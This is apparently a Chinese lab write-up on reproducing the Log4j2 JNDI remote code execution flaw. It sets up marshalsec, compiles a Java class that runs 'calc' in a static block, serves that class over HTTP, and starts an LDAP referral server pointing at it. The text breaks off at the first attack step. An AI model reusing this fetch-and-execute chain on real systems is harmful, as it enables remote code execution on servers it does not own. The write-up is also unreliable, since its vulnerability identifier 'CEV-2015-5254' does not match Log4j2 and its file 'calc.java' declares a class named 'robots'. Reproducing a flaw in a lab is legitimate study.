Log4j2远程代码执行漏洞(CEV-2015-5254)本地复现

Log4j2远程代码执行漏洞(CEV-2015-5254)本地复现

目录

Windows环境搭建

ubuntu环境搭建

攻击复现

---

Windows环境搭建

1.安装java1.8版本

2.打开受影响版本的jar包,文件放在了百度网盘中,请自取
链接：https://pan.baidu.com/s/1Jn-hXXv2uXc_W06bJ9-46Q
提取码：c4qy

 

ubuntu环境搭建

 1.安装默认JRE / JDK

        接下来，检查是否已安装Java：java -version

        如果当前未安装Java，您将看到以下输出：

        执行以下命令安装OpenJDK： 

 $ sudo apt install default-jre

 

        除了JRE之外，您可能还需要Java Development Kit（JDK）才能编译和运行某些特定的基于 Java的软件。要安装JDK，请执行以下命令，该命令还将安装JRE：

 $ sudo apt install default-jdk

 2.下载marshalsec（或者用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar）

   git clone https://github.com/mbechler/marshalsec.git

3.下载maven

sudo apt-get install maven

4.编译marshalsec

 mvn clean package -DskipTests

5.恶意代码文件calc.java,功能是在windows中执行calc命令,d出计算器

import java.lang.Runtime;
import java.lang.Process;
public class robots{
	static {
		try {
			Runtime rt = Runtime.getRuntime();
			String[] commands = {"calc"};
			Process pc = rt.exec(commands);
			pc.waitFor();
			} catch (Exception e) {
			// do nothing
			}
		}
	}

6.编译文件：javac calc.java

 7.用python搭建http服务传输class文件

python -m SimpleHTTPServer 8080

8.进入marshalsec下的target目录启动一个LDAP服务器，监听9999端口

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://[ip]/#calc" 9999

 命令中的ip填刚才搭建http服务的ip地址和端口,calc就是class类名

攻击复现

1.运行代码,相当于往日志中写入恶意代码